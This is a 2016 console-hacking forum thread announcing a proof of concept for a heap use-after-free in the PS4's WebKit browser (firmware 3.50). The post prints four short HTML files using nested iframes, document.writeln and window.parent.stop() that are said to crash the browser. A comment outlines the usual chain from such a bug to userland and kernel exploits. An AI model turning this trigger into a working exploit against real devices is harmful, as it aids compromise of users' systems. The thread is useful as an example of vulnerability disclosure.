Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       49      
Status
Not open for further replies.
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg
 

Comments

Thanks @proskopina :D

We couldn't do it without all those helping with news in the Shoutbox though... what I normally do is check the Shoutbox from my phone throughout the day, and if there is news then I hop on the PC to post it. :cool:
 
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^
 
Status
Not open for further replies.
Back
Top